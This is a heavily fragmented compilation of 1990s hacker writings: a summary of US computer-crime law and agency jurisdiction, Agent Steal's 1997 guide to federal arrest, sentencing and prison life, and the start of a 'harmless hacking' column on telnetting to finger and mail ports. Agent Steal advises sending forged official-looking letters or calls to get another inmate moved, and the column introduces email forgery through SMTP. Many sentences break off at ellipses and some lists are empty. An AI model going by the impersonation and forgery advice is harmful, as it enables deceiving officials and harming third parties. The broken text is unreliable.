This means that even if you can prove you harmed the computer by accident, you still may go to prison
...

6
...
(The offense must be committed knowingly and with intent to
defraud
...
When one hacker finds a way to
slip into another person’s computer, it can be really tempting to give out a password to someone else
...
They also boast
...

Penalty: Fine and/or up to 1 year in prison, up to 10 years if repeat offense
...
A computer that is exclusively for use of a financial institution[defined below] or the U
...
government or,
if it is not exclusive, one used for a financial institution or the U
...
government where the offense adversely
affects the use of the financial institution’s or government’s operation of the computer; or
2
...

This section defines a financial institution as follows:
1
...

2
...

3
...

4
...

5
...

6
...


7
...

8
...

9
...

WHO’S IN CHARGE OF BUSTING THE CRACKER WHO GETS A BIT FROGGY REGARDING SECTION
1030?
(FBI stands for Federal Bureau of Investigation, USSS for US Secret Service)
Section of Law
1030(a)(1)

Type of Information
National Security

National defense
1030(a)(2) Foreign relations
Restricted atomic energy

Jurisdiction
FBI

USSS

JOINT

X
X
X

1030(a)(2) Financial or consumer
Financial records of
banks, other financial
institutions
Financial records of
card issuers
Information on consumers
in files of a consumer
reporting agency
Non-bank financial
institutions
1030(a)(3) Government computers
National defense
Foreign relations
Restricted data
White House
All other government
computers

X

X

X
X

X
X
X
X
X

1030(a)(4) Federal interest computers:
Intent to defraud

X

1030(a)(5)(A) Transmission of programs, commands:
Intent to damage or deny use
1030(a)(5)(B) Transmission off programs, commands:
Reckless disregard
1030 (a)(6) Trafficking in passwords:
Interstate or foreign commerce
Computers used by or for the government

X

X

X
X

Regarding 1030 (a)(2): The FBI has jurisdiction over bank fraud violations, which include categories (1)
through (5) in the list of financial institutions defined above
...

Regarding 1030(a)(3) Government Computers: The FBI is the primary investigative agency for violations of
this section when it involves national defense
...
Unauthorized access to other information in government computers falls under the primary
jurisdiction of the Secret Service
...
”
This information was swiped from _Computer Crime: A Crimefighter’s Handbook_ (Icove, Seger &
VonStorch
...
)
The following is Agent Steal's guide to what one will face if one is arrested in the US for computer crime
...
But as Agent Steal and
so many others have learned, it isn't that easy to get away with stuff
...
net
Contributions and editing by Minor Threat and Netta Gilboa
Special thanks to Evian S
...
Any reproduction for profit, lame zines, (that means you t0mmy, el8, you thief) or law enforcement
use is prohibited
...

---------------CONTENTS
---------------PART I - FEDERAL CRIMINAL LAW
Foreward
Introduction
A
...
Preparing for Trial
C
...
Conspiracy
E
...
Use of Special Skill
G
...
State v
...
Cooperating
J
...
Search and Seizure
L
...
Presentence Investigation
N
...
Evidentiary Hearing
P
...
Outstanding Warrants
R
...
Summary
PART II - FEDERAL PRISON
A
...
Federal
B
...
Getting Designated
D
...
Population
F
...
Disciplinary Action
H
...
Prison Officials
J
...
Good Time
L
...
Supervised Release
N
...
There are thousands of paper and electronic magazines, CD-ROMS, web pages and text
files about hackers and hacking available, yet there is nothing in print until now that specifically covers
what to do when an arrest actually happens to you
...
Most of them aren't told
the full scope of the investigation up front, and as the case goes on more comes to light, often only at the
last minute
...
Once one
person goes down it always affects many others later
...
What goes around, comes around
...
From what I've seen
on the criminal justice system as it relates to hackers, the less enemies you pick on the better and the less
groups you join and people who you i nteract with the better as well
...

I met Agent Steal, ironically, as a result of the hackers who had fun picking on me at Defcon
...
He wrote me a letter of support, and while several hackers taunted me that I had
no friends in the community and was not wanted, and one even mailbombed our CompuServe account
causing us to lose the account and our email there, I laughed knowing that this article was in progress and
that of all of the publications it could have been given to first it was Gray Are as that was chosen
...
I know there will be many more hacker cases until
hackers work together instead of attacking each other and making it so easy for the government to divide
them
...
Hackers are simply the easiest targets of any criminal subculture
...
org makes nice T-shirts (which they don't give free or even discount to hackers in jail, btw), they
simply don't have the resources to help hackers in trouble
...
Knight Lightning still owes his attorney money
...
This is not something that disappears from your life the day the case is over
...
While there are notable exceptions, this has
been true for more hackers than I care to think about
...
The mainstream media will lie about your charges, the facts of your case
and the outcome
...
" While most hackers probably
think Emmanuel Goldstein and 2600 will help them, I know of many hackers whose cases he ignored totally
when contacted
...
Bernie S
...
One thing is clear though
...
It does give pause for thought, if he cares so much about the hackers and not his own sales and fame,
as to why he has no ties to the Hackerz
...
Phrack and other zines historically have merely reposted incorrect newspaper reports which can cause
the hackers covered even more damage
...
Remember too that your "friends" are the people most likely to get you arrested too, as even if your
phone isn't wiretapped now theirs may be, and the popular voice bridges and conference calls you talk to
them on surely are
...
Next time you
put down a hacker in jail and laugh about how they are getting raped wh ile you're on IRC, remember that
someone is probably logging you and if you stay active it's a good bet your day will come too
...
Those of us who have been there before wish you
good luck in advance
...
Your lawyer isn't likely to know a thing about computer crimes and
it's the cases of the hackers who were arrested before you which, like it or not, will provide the legal
precedents for your own conviction
...
No matter
how precautionary or sage you are, you're bound to make mistakes
...

For anyone active in hacking I cannot begin to stress the importance of the information contained in this
file
...
To those who have never been busted, reading this file will likely change
the way you hack, or stop you from hacking altogether
...
" I doubt that anyone would disagree: The
criminal justice system is a game to be played, both by prosecution and defense
...
The writer and contributors of this file have

learned the hard way
...
Having filed our own motions, written our own briefs and
endured life in prison, we now pass this knowledge back to the hacker community
...
and our mistakes
...
THE BOTTOM LINE - RELEVANT CONDUCT
For those of you with a short G-phile attention span I'm going to cover the single most important topic first
...
The subject I
am talking about is referred to in legal circles as "relevant conduct
...

However, I have to make his crystal clear so that it will stick in your heads
...
ONCE YOU ARE FOUND GUILTY OF EVEN ONE COUNT, EVERY COUNT WILL BE USED
TO CALCULATE YOUR SENTENCE
Regardless of whether you plea bargain to one count or 100, your sentence will be the same
...
All of
these are treated the same
...
You do not have to be proven guilty of every act
...
I know this sounds insane ,
but it's true; it's the preponderance of evidence standard for relevant conduct
...

II
...
It's simple; More Money = More Time
...
Each one could be a count but it's the loss
that matters
...
It also doesn't matter if
you tried to break into one company's computer or 10
...

B
...
The United States Sentencing Guidelines
(U
...
S
...
), are in fact quite complex
...
If you get busted, I would highly recommend hiring one
...
" Save your money, plead
out, do your time
...
S
...
However, I don't want to gloss over the importance of a ready
for trial posturing
...

C
...
Finding the proper one can be a difficult task
...
In actuality a simple plea and sentencing should run you around $15,000
...
And finally, a post conviction specialist will charge $5000 to $15,000 to
handle your sentencing presentation with final arguments
...
Usually they are worthless,
occasionally you'll find one that will fight for you
...
All I can say is if you don't
like the one you have, fire them and hope you get appointed a better one
...

This specialist will make certain the judge sees the whole picture and will argue in the most effective manner
for a light or reasonable sentence
...

Your sentencing hearing is going to flash by so fast you'll walk out of the court room dizzy
...

The plea agreement you sign is going to affect you and your case well after you are sentenced
...
There are many issues in a plea to negotiate
over
...
Once you get to a real
prison with real jailhouse lawyers you will find out how bad you got screwed
...
This being the case you need to remember two things: bring all
your appealable issues up at sentencing and file a notice of appeal within 10 days of your sentencing
...

I should however, mention that you can appeal some issues even though you signed away your rights to
appeal
...
If the judge orders
something that is not permissible by statute, you then have a constitutional right to appeal your sentence
...
Q: How can you tell when your attorney is lying? A: You can see
his lips moving
...
CONSPIRACY
Whatever happened to getting off on a technicality? I'm sorry to say those days are gone, left only to the
movies
...
The most alarming trend, and surely the root of the prosecutions success, are the liberally worded
conspiracy laws
...
Yes, it's true
...
Paging Mr
...
Hello?
Here's a hypothetical example to clarify this
...
and Marc A
...
They talk about
hacking into Apple's mainframe and erasing the prototype of the new Apple Web Browser
...

The next morning, the Feds raid Marc's house and seize everything that has wires
...
They are both found guilty of conspiracy to commit unauthorized
access to a computer system
...
SENTENCING
At this point it is up to the probation department to prepare a report for the court
...
Apple Computer Corporation
estimates that if Bill and M arc would have been successful it would have resulted in a loss of $2 million
...
Based on this basic scenario our dynamic duo would receive roughly
three-year sentences
...
Let's say that the FBI also found a file on Marc's computer with 50,000 unauthorized account numbers
and passwords to The Microsoft Network
...
Generally the government places a $200-per-account attempted loss on things of this

nature (i
...
credit card numbers and passwords = access devices)
...
Coupled
with the $2 million from Apple, Marc is going away for about nine years
...

Some of the other factors to be used in the calculation of a sentence might include the following: past
criminal record, how big your role in the offense was, mental disabilities, whether or not you were on
probation at the time of the offense, if any weapons were used, if any threats were used, if your name is
Kevin Mitnick (heh), if an elderly person was victimized, if you took advantage of your employment
position, if you are highly trained and used your special skill, if you cooperated with the authorities, if you
show remorse, if you went to trial, etc
...
It would be
beyond the scope of this article to cover the U
...
S
...
in complete detail
...
Neverthele ss, if you remember my two main points in addition to how the
conspiracy law works, you'll be a long way ahead in protecting yourself
...
USE OF A SPECIAL SKILL
The only specific "sentencing enhancement" I would like to cover would be one that I am responsible for
setting a precedent with
...
S
...
3d
...
, the United States Court of Appeals held
that some computer hackers may qualify for the special skill enhancement
...
In my case it added eight months to my 33-month sentence bringing it to
41 months
...
It's ironic that if I were to
have remained strictly a criminal hacker then I would have served less time
...
The
U
...
S
...
came into effect in 1987 in an attempt to eliminate disparity in sentencing
...
Unfortunately, this practice still
continues
...
S
...
G
...

G
...
Presently this
method will be the exception rather than the rule and it is more likely that you will be taken into custody at
the time of the raid
...
This is part of the
government's plan to break you down and win their case
...
In order to qualify for bail, you must meet the following criteri a:
- You must be a resident of the jurisdiction in which you were arrested
...

- You cannot have a history of failure to appear or escape
...

In addition, your bail can be denied for the following reasons:
- Someone came forward and stated to the court that you said you would flee if released
...

- You have a prior criminal history
...

What results from all this "bail reform" is that only about 20% of persons arrested make bail
...

Now you're in jail, more specifically you are either in an administrative holding facility or a county jail that
has a contract with the Feds to hold their prisoners
...
County jails are typically the last place you would want to be
...
STATE VS
...
" You may
even be able to nudge the Feds into indicting you
...
With the state you will do
considerably less time, but will face a tougher crowd and conditions in prison
...
More on this later
...

Some of the other inmates will be predatorial but the Feds do not tolerate much nonsense
...
If they continue to pose a threat to the inmate population, they will be left
in segregation (the hole)
...
This isn't really to protect the inmate
...

I
...
First at your residence and, if you
appear to be talkative, they will take you back to their offices for an extended chat and a cup of coffee
...
Regardless of what the situation is, or how you plan to proceed, there is nothing you can say that
will help you
...
Even if you know that you are going to cooperate, this is not the time
...
This trend stems from the extremely long sentences the Feds are
handing out these days
...
This is a decision each individual needs to make
...
Anyone else is fair game
...
" It's no secret that the first defendant in a conspiracy is usually going to get the best
deal
...

Incidently, being debriefed or interrogated by the Feds can be an ordeal in itself
...
Once you know their methods it will be
all quite transparent to you and the debriefing goes much more smoothly
...
If you make any
mistakes they will renege on the deal and you'll get nothing
...
They just want you to plead guilty
...
That is to be decided after your
testimony, etc
...
It's entirely up to the judge
...
In fact, if the prosecution does not motion
the court for your "downward departure" the courts' hands are tied and you get no break
...
Most people, particularly those who have never spent a
day in jail, will tell you not to cooperate
...
" This is a noble stance to take
...
Saving someone's ass who would easily do the same to you is a tough call
...
Like I said, save your friends then do what you have to do
to get out of prison and on with your life
...
It wasn't easy
...
Many of you probably know
that I (Agent Steal) went to work for the FBI after I was arrested
...
What many of you don't know is that I had close FBI ties prior to my
arrest
...
That
is why I was given that opportunity
...
Our relationship ran afoul, mostly due to their passive negligence and lack of
experience in dealing with hackers
...
They no longer need hackers to show them the ropes or the latest
security hole
...
The typical range is 20% to 70%
...
Sometimes you may find yourself at the end of the prosecutorial food chain and the
government will not let you cooperate
...
Even if he wanted to
roll over, I doubt it would get him much
...
My final advice in this
matter is get the deal in writing before you start cooperating
...
There is a provision in the
Sentencing Guidelines, 3E1
...
If you go to trial, typically you will not qualify for this "acceptance of responsibility" and
your sentence will be longer
...
STILL THINKING ABOUT TRIAL
Many hackers may remember the Craig Neidorf case over the famous 911 System Operation documents
...
It was an egg in the face day for
the Secret Service
...
The government learned a lot from this fiasco and even with the laudable support
from the EFF, Craig narrowly thwarted off a conviction
...
Th e point I'm trying to make is that it's tough to beat the Feds
...
If you want to really win you need
to know how they build a case in the first place
...
SEARCH AND SEIZURE
There is a document entitled "Federal Guidelines For Searching And Seizing Computers
...
It's an intriguing collection of tips, cases, mistakes and, in general,
how to bust computer hackers
...

Search and seizure is an ever evolving jurisprudence
...
Again, a com
plete treatment of this
subject is beyond the scope of this paper
...
PC is anything that gives him an inkling to believe you we re committing a

crime
...

L
...
It requires a court order
and they have to show that there is no other way to obtain the information they seek, a last resort if you will
...
They have to lease lines from the phone company, pay agents to
monitor it 24 hours a day and then transcribe it
...

Expensive interception/translation equipment must be in place to negotiate the various modem speeds
...
It's a daunting task and
usually reserved for only the highest profile cases
...
I don't know what they hate worse though, asking for
outside help or wasting valuable internal resources
...
Ba da boom, ba da busted
...
The phone companies keep racks of them at their security
departments
...
They don't
need a court order, but the Feds do
...
This can be done on the switching system level or via a billing database search
...
However, I've heard stories of cooperative telco security
investigations passing the information along to an agent
...
" (legal humor)
I'd love to tell you more about FBI wiretaps but this is as far as I can go without pis sing them off
...
So I think I'll stop here
...
(hacker humor)
In closing this subpart I will say that most electronic surveillance is backed up with at least part-time
physical surveillance
...
They like late model mid-sized
American cars, very stock, with no decals or bumper stickers
...
Hide it on your person, stick an
ear plug in your ear (for the Xplorer) and take it everywhere you go
...

M
...
This has absolutely nothing to do with getting probation
...
The P
...
is
empowered by the court to prepare a complete and, in theory, unbiased profile of the defendant
...
Every little dirty scrap of information that
makes you look like a sociopathic, demon worshiping, loathsome criminal will be included in this report
...

My advice is simple
...
Have your attorney present and think about how what
you say can be used against you
...
O
...


Mr
...
In my spare time I work for charity helping
orphan children
...
Steal has never completed his education and hangs around with little children in
his spare time
...
PROCEEDING PRO SE
Pro Se or Pro Per is when a defendant represents himself
...
" Truer words were never spoken
...
Even if you have a great attorney it's good to be able to keep an
eye on him or even help out
...
They may
think you're a pain in the ass but it's your life
...
Regardless, representing yourself is
generally a mistake
...
At this point there are legal avenues, although quite
bleak, for post-conviction relief
...
The best place to start in understanding the legal system lies in three inexpensive books
...
00) and Federal Criminal Codes and Rules ($20
...
I consider possession of these books to be mandatory for any pretrial
inmate
...
The book sells for around $40
...
And last but not least the definitive Pro Se authority, "The Prisoners Self
Help Litigation Manual" $29
...
Or try http://www
...
com/books/n148
...
EVIDENTIARY HEARING
If you disagree with some of the information presented in the presentence report (PSR) you may be entitled
to a special hearing
...
One
important thing to know is that your PSR will follow you the whole time you are incarcerated
...
This can affect your security level, your halfway house,
your eligibility for the drug program (which gives you a year off your sentence) ,and your medical care
...
GETTING YOUR PROPERTY BACK
In most cases it will be necessary to formally ask the court to have your property returned
...

You will need to file a 41(e) "Motion For Return Of Property
...
They may not care and the judge will simply
order that it be returned
...
Tell him you
need it for your job
...

Q
...
If you follow the correct procedure chances are
good the warrants will be dropped (quashed)
...
" Typically in non-violent crimes
you can serve several sentences all at the same time
...
In a nutshell: concurrent is good, consecutive bad
...
You may also file a
"demand for speedy trial", with the appropriate court
...
If they don't extradite
you within a certain period of time , the charges will have to be dropped
...

R
...
" Well, that's just great, but
...
Of course who's
to say otherwise if you forgot your password in all the excitement of getting arrested
...
"Senator, I have no recollection of the
aforementioned events at this time
...
However, it would be foolish
to rely on it
...
If you understand the true art of code breaking you should understand
this
...
By attacking the access to your encryption program with a
keyboard emulation sequencer your triple DES/128 bit RSA crypto is worthless
...

S
...
You're going to get
busted, lose everything you own, not get out on bail, snitch on your enemies, get even more time than you
expected and have to put up with a bu nch of idiots in prison
...
And, if possible,
work on those sensitive
...
That way they can hang an espionage rap on you
...

I know this may all sound a bit bleak, but the stakes for hackers have gone up and you need to know what
they are
...
If you are young, a first-time offender,
unsophisticated (like MOD), and were just looking around in some little company's database, you might get
probation
...
As a rule, the Feds won't take the case unless $10,000 in damages are involved
...
They may decide to, for insurance purposes, blame some huge downtime expense on you
...
It took us two weeks
to bring it up again for a loss in wasted manpower of $2 million
...
That way the government has a
firm loss figure
...
I'm not advocating blatant criminal actions
...

PART II - FEDERAL PRISON
A
...
FEDERAL
In most cases I would say that doing time in a Federal Prison is better than doing time in the state
institutions
...
This is going to be changing however
...

Federal prisons are generally going to be somewhat less crowded, cleaner, and more laid back
...
I
spent most of my time in the library hanging out with Minor Threat
...
"My sentence was longer," he would argue
...

(humor) Exceptions to the Fed is better rule would be states that permit televisions and word processors in
your cell
...
The states have varying privileges
...
There are also states that are abolishing parole, thus taking away the
ability to get out early with good behavior
...

B
...
Prisons are assigned a security level and only prisoners
with the appropriate ratings are housed there
...

Still, they are essentially separate prisons, divided by fences
...
Generally speaking, you will find first time, nonviolent offenders with less than 10 year sentences there
...
Your work assignment at a
camp is usually off the prison grounds at a nearby military base
...

The next level up is a low Federal Correctional Institution (FCI)
...
There is a double fence with razor wire
surrounding it
...
You would really have to piss someone
off before they would take a swing at you
...
More razor wire, more guards,
restricted movement and a rougher crowd
...

Fighting is much more common
...
Killings
are not too terribly common
...

The United States Penatentury (U
...
P
...
"Leavenworth" and "Atlanta" are the most infamous of these joints
...
The murder rate per prison
averages about 30 per year with well over 250 stabbings
...
" Max custody inmates
are locked down all the time
...
The shower is on
wheels and it comes to your door
...
Mr
...
So does
Aldridge Ames, the spy
...
GETTING DESIGNATED
Once you are sentenced, the BOP has to figure out what they want to do with you
...
It is publicly available through
the Freedom of Information Act and it is also in most prison law libraries
...
As a result, most prison officials responsible for classifying you do pretty much
as they please
...
As a computer
hacker you will most likely be placed in a camp or a low FCI
...
-IF- you do wind up in an FCI, you should make it to a camp after six months
...

Another thing the Region Designator will do is to place a "Computer No" on your file
...
In my case I wasn't allowed to be
within 10 feet of one
...
Incidentally, the BOP uses PC/Server based LANs with NetWare 4
...
PC based gateways reside a t every prison
...
Sentry resides in Washington,
D
...
with SNA type network con centrators at the regional offices
...
Needless to say, BOP computer security is very lax
...
They
have other networks as well, but this is not a tutorial on how to hack the BOP
...
(humor)
Not surprisingly, the BOP is very paranoid about computer hackers
...
Nevertheless, they tried restricting
my mail on numerous occasions
...
My 20 or so magazine subscriptions were permitted to come
in, after a special screening
...
It's my understanding, however, that many hackers at other prisons have not
been as fortunate as I was
...
IGNORANT INMATES
You will meet some of the stupidest people on the planet in prison
...
And for some strange reason these uneducated low class common
thieves think they deserve your respect
...
These are the same people that
condemn everyone who cooperated, while at the same time feel it is fine to break into your house or rob a
store at gunpoint
...
They will do this for no reason other than the fact you are an easy mark
...
The key to your success is acting
before the problem escalates
...
The objective is simply to have your problem inmate moved to
another institution
...

Social engineered letters (official looking) or phone calls from the right source to the right department will
often evoke brisk action
...
If the BOP has reason
to be lieve that an inmate is an escape risk, a suicide threat, or had pending charges, they will handle them

much differently
...
I have a saying: "Hackers
usually have the last word in arguments
...

Chances are you won't have many troubles in prison
...
Nevertheless, I've covered all of this in the event you find yourself
caught up in the ignorant behavior of inmates whose lives revolve around prison
...

Just do it
...
POPULATION
The distribution of blacks, whites and Hispanics varies from institution to institution
...
The remaining 10% are various other races
...
I'm not necessarily a prejudiced person, but prisons where
blacks are in majority are a nightmare
...

In terms of crimes, 60% of the Federal inmate population are incarcerated for drug related crimes
...
The
Federal prison population has changed over the years
...
The tough
drug laws have changed all of that
...
Quite simply, in medium and low
security level Federal prisons it is unheard of
...
When it does happen, one
could argue that the victim was asking for it
...
" Indeed
...
I would
occasionally have inmates that would subtly ask me questions to see where my preferences lie, but once I
made it clear that I didn't swing that way I would be left alone
...
Many of us
heard how Bernie S
...
Indeed, I had to get busy a couple of times
...
If you want to stay
out of trouble in a state prison, or Federal for that matter, don't use the phone too long, don't change the
channel and don't get involved in gambling or drugs
...
And always, always, be respectful
...

My final piece of prison etiquette advice would be to never take your inmate problems to "the man" (prison
staff)
...
Th e rules are set by the prisoners themselves
...
In some prisons inmates are so
afraid of being labeled a rat that they refuse to be seen talking alone with a prison staff member
...
Prison is a strange environment
...
DOING TIME
You can make what you want to out of prison
...
Others immerse
themselves in a routine of work and exercise
...
Regardless, prisons are no
longer a place of rehabilitation
...
The
effect is that angry, uneducated, and unproductive inmates are being released back into society
...
I played drums for two
different prison bands
...
Now the program has been canceled, all because some senator wanted to be seen as being tough on
crime
...
The cable TV is gone, pornography mags are no longer permitted, and
the weight piles are being removed
...
I don't want to get started on this
subject
...
Study, get into a routine and before
you know you 'll be going home, and a better person on top of it
...
DISCIPLINARY ACTIONS
What fun is it if you go to prison and don't get into some mischief? Well, I'm happy to say the only "shots"
(violations) I ever received were for having a friend place a call with his three-way calling for me (you can't
call everyone collect), and drinking homemade wine
...
My punishment was ten hours of
extra duty (cleaning up)
...
Shots can also increase your security level and can get you
transferred to a higher level institution
...

H
...
First you must try to resolve it informally
...
The BP-9 goes to the warden
...
Finally, a
BP-11 goes to the National BOP Headquarters (Central Office)
...
Delay and conquer is the BOP motto
...
In some extreme cases you may take your case directly
to the courts without exhausting the remedy process
...

My best advice with this remedy nonsense is to keep your request brief, clear, concise and only ask for one
specific thing per form
...
If you don't, or if the BOP can find any
reason to deny your request, they will
...
If it was a substantial enough
issue I would inform the media, the director of the BOP, all three of my attorneys, my judge and the ACLU
...
It always pisse d them off
...
In the past I might have resorted to hacker tactics, like disrupting the BOP's
entire communication system bringing it crashing down! But
...
Incidently, most BOP
officials and inmates have no concept of the kind of havoc a hacker can wield on an individuals life
...
Deal with it, you're not in cyberspace anymore
...
PRISON OFFICIALS
There are two types, dumb and dumber
...
Typically you will find staff that are
either just doing their job, or staff that is determined to advance their career
...
They don't get anywhere by being nice to inmates so they are often quite
curt
...
All in all they're a pain in the ass but easy
to deal with
...

If they don't know you by name you're in good shape
...
If you
are a pretentious articulate educated white boy like myself you would be wise to act a little stupid
...
Many dislike all
inmates to begin with
...
It's all a rather bizarre environment where everyone seems to hate the ir jobs
...

Before I move on, sometimes there will be certain staff members, like your Case Manager, that will have a
subs tantial amount of control over your situation
...
Be polite, don't file grievances against them and hope that they will take care of you when it
comes time
...
It's especially helpful if you have outsi de people willing to make calls
...
If
you have received a lot of bad press, this could be a disadvantage
...
All in all how you
choose to deal with staff is often a difficult decision
...

J
...
Sometimes you will wind up there because of what someone else did
...
Your privileges will vary, but at first you get nothing but a
shower every couple of days
...
With no
snacks you often find yourself quite hungry in-between meals
...

Disciplinary actions will land you in the hole for typically a week or two
...
It depends on the shot and on the Lieutenant that sent you there
...

K
...
If anyone tells you that a bill is going to be
passed to give 108 days, they are lying
...
The BOP has come up with the most complicated and
ridiculous way to calculate how much good time you have earned
...
I studied the book intensely and came to the
conclusion that the only purpose it serves is to covertly steal a few days of good time from you
...

L
...
At the CCC, which is nothing more than a large house in a bad part of town, you
are to find a job in the communit y and spend your evenings and nights at the CCC
...
They will breathalyse and
urinanalyse you routinely to make sure you are not having too much fun
...
Most CCCs will transfer you to home confinement status
after a few weeks
...
They check up on you by phone
...

M
...
For the next 3 to 5 years you will be on Supervised Release
...
Despite this they still want to
keep tabs on you for awhile
...
You are a not a free man able
to travel and work as you please
...
O
...
Your P
...
can violate you for any technical
violations and send you back to prison for several months, or over a year
...
If you come up dirty it's back to the joint
...
While this may sound pragmatic to the public, in practice it serves no other purpose that to
punish and limit a former hacker's ability t o support himself
...
If a hacker is predisposed to hacking he's going to be able to do it with
or without restrictions
...
As you
probably know a phone and a little social engineering go a long way
...
O
...
If you give your
P
...
no cause to keep an eye on you, you may find the reins loosening up
...
After a year or so, with good cause, and all of your
government debts paid, it might be plausible
...

For many convicts Supervised Release is simply too much like being in prison
...
Although the
judge may continue your supervis ion, he/she typically will not
...
SUMMARY
What a long strange trip it's been
...
I can
however, say that I HAVE benefitted from my incarceration
...
No , despite their efforts to kick me when I was down, use me, turn
their backs after I had assisted them, and in general, just violate my rights, I was still able to emerge better
educated than when I went in
...
The long term
effects of incarceration and stress were creeping up on me, and I could see prison conditions were
worsening
...
Yes, the
criminal justice system is that screwed up
...
Quite simply, the system is not
working
...
I'm not telling you how not
to get caught and I'm not telling you to stop hacking
...
For some strange reason I am oddly compelled to tell you what happened to
me
...
Whatever the reason, I just sat
down one day and started writing
...
Once you get grabbed
by the law, sucked into their vacuum, and they shine the spotlight on you, there will be little you can do to
protect yourself
...
It's open season for
the U
...
Attorneys, your attorney, other inmates, and prison officials
...
Defending
yourself from all of these forces will require all of your wits, all of your resources, and occasionally your
fists
...
They
will print what suits them and often omit many relevant facts
...
Let me assure you that if you met me today
you would quickly see that I am quite likable and not the villain many (especially Jon Littman) have made me
out to be
...
Granted I've made my mistakes, growing up has been a long road for me
...
Friends that I am immensely loyal to
...
All of those assessments would be incorrect
...
I just hope I was able to enlighten you and in some way to help you make the
right choice
...

See you in the movies
Agent Steal
1997

Contents of Volume 1:
Hacking tip of this column: how to finger a user via telnet
...

How get Usenet spammers kicked off their ISPs
How get email spammers kicked off their ISPs
...

How to Forge Email Using Eudora Pro
_______________________________________________________
GUIDE TO (mostly) HARMLESS HACKING
Vol
...

_______________________________________________________
Hacking
...

But I define hacking as taking a playful, adventurous approach to computers
...

We fool around and try odd things, and when we stumble across something entertaining we tell our friends
about it
...

Furthermore, hacking is surprisingly easy
...
If you are a female hacker you become totally irresistible to all men
...
In fact, after reading just this first Guide to (mostly)
Harmless Hacking, you will be able to pull off a stunt that will impress the average guy or gal
unlucky^H^H^H^H^H^H^H fortunate enough to get collared by you at a party
...

Have you ever posted a message to a news group or email list devoted to hacking? You said something like
“What do I need to become a hacker?” right? Betcha you won’t try *that* again!
It gives you an education in what “flame” means, right?
Yes, some of these 3l1te types like to flame the newbies
...

*********************
Newbie note: 3l1t3, 31337, etc
...
” The idea is to take either the word “elite” or “eleet” and
substitute numbers for some or all the letters
...
Hacker d00dz do this sor7 of th1ng l0tz
...
But there is a reason many hackers are quick to flame
strangers who ask for help
...
But I *don't* want to learn
programming and operating systems
...
Post something like this and you are likely to wake
up the next morning to discover your email box filled with 3,000 messages from email discussion groups on
agricultural irrigation, proctology, collectors of Franklin Mint doo-dads, etc
...
, etc
...
arrrgghhhh!
The reason we worry about wannabe hackers is that it is possible to break into other people’s computers
and do serious damage even if you are almost totally ignorant
...
There are public FTP and Web sites on
the Internet that offer canned hacking programs
...

This column will teach you how to do real, yet legal and harmless hacking, without resorting to these
hacking tools
...
Or even how to break in where
you don’t belong
...
If you telnet across a state line to break in, you have committed a
federal felony
...
The reason is that each computer on the Internet has some sort of
public connections with the rest of the Net
...

That, of course, is what you already do when you visit a Web site
...
Furthermore, these are
*fun* hacks
...
And -- these are hacks that anyone can do
...
It will make hacking infinitely easier:
A SHELL ACCOUNT!!!!
A “shell account” is an Internet account in which your computer becomes a terminal of one of your ISP’s
host computers
...

Warning: the tech support person at your ISP may tell you that you have a “shell account” when you really
don’t
...
Guess why? If you don’t have a shell account, you
can’t hack!
But you can easily tell if it is a real shell account
...
You will need a program that allows you to imitate a VT 100 terminal
...
1 or
Windows 95, a VT 100 terminal program is included as one of your accessory program
...
Get one and then try out a few
Unix commands to make sure it is really a shell account
...
No, I don't mean the kind with breathless titles like “Secrets of Super hacker
...
They are full of hot air and thin on how-to
...
I like "The Unix Companion" by Harley Hahn
...
I like "Learning the Bash Shell" by Cameron Newham and Bill Rosenblatt
...

c) TCP/IP, which is the set of protocols that make the Internet work
...

OK, rant is over
...

Have you ever used the finger command before? Finger will sometimes tell you a bunch of stuff about other
people on the Internet
...
com
But instead of Joe Schmoe, you put in the email address of someone you would like to check out
...
com
...
com
Now this command may tell you something, or it may fail with a message such as “access denied
...
You can give the command:
telnet llama
...
com 79
What this command has just done is let you get on a computer with an Internet address of llama
...
com
through its port 79 -- without giving it a password
...
Make that command:
cmeinel
This will tell you a hacker secret about why port 79 and its finger programs are way more significant than
you might think
...

Now, for an extra hacking bonus, try telnetting to some other ports
...
swcp
...
swcp
...
And I promise to tell you more about what the big deal is over telnetting
to finger -- but later
...
com
...
com
...
1 Number 2
In this issue we learn how to forge email -- and how to spot forgeries
...
Of course, the flaw he exploited to fill up
10% of the computers on the Internet with his self-mailing virus has been fixed now -- on most Internet
hosts
...
In fact, what we are
about to learn is the first step of several of the most common ways that hackers break into private areas of
unsuspecting computers
...
It sounds too sleazy
...

So what you are about to learn is legal, harmless, yet still lots of fun
...

But -- to do this hack, you need an on-line service which allows you to telnet to a specific port on an
Internet host
...

But Compuserve, America Online and many other Internet Service Providers (ISPs) are such good nannies
that they will shelter you from this temptation
...
Unix is a lot like
DOS
...
Unix is the language of the Internet
...

****************************
Even if you have never telnetted before, this hack is super simple
...
And you
only need to memorize *two* commands
...
unm
...
My Compuserve account gets the vapors when I try
this
...
"
But at least today Netcom will let me do this command
...
Many college accounts will let you get away
with this, too
...
Look under Internet
...
”
They’ll usually say, “Sure, can do
...
They think you are too dumb to know
what a real shell account is
...

The way around this is to ask for a free temporary guest account
...
Then try out today’s hack
...
So let's get back to this
command:
telnet callisto
...
edu 25

If you have ever done telnet before, you probably just put in the name of the computer you planned to visit,
but didn't add in any numbers afterward
...

What that 25 means is that you are commanding telnet to take you to a specific port on your intended
victim, er, computer
...
On your home computer, examples of ports
are your monitor, which sends information out, your keyboard and mouse, which send information in, and
your modem, which sends information both out and in
...
unm
...

These ports are identified by numbers
...
They are virtual (software) ports
...
Incredible phun
...
But, more
often than not, you get something like this:
Trying 129
...
96
...

Connected to callisto
...
edu
...

220 callisto
...
edu Smail3
...
28
...
It just says
...
1
...
1, a program used to compose and send email
...
unm
...
In general, when you get on a strange computer,
at least one of three commands will get you information: "help," "?", or "man
...
and this is what I get
250 The following SMTP commands are recognized:
250
250 HELO hostname startup and give your hostname
250 MAIL FROM: start transaction from sender
250 RCPT TO: name recipient for message
250 VRFY

verify deliverability of address
250 EXPN

expand mailing list address
250 DATA
start text of mail message
250 RSET
reset state, drop transaction
250 NOOP
do nothing
250 DEBUG [level]
set debugging level,default 1
250 HELP
produce this help message
250 QUIT
close SMTP connection
250
250 The normal sequence of events in sending a message is to state the

250 sender address with a MAIL FROM command, give the recipients with
250 as many RCPT TO commands as are required (one address per command)
250 and then to specify the mail message text after the DATA command
...
End the last one with a QUIT
...
It makes you look really kewl because you know how to get the
computer to tell you how to hack it
...
For the rest, you can simply check up on the commands while on-line
...
Heck,
maybe half a minute
...
And guess why you can get on it without logging in? Guess why it was the point of vulnerability
that allowed Robert Morris to crash the Internet?
Port 25 moves email from one node to the next across the Internet
...

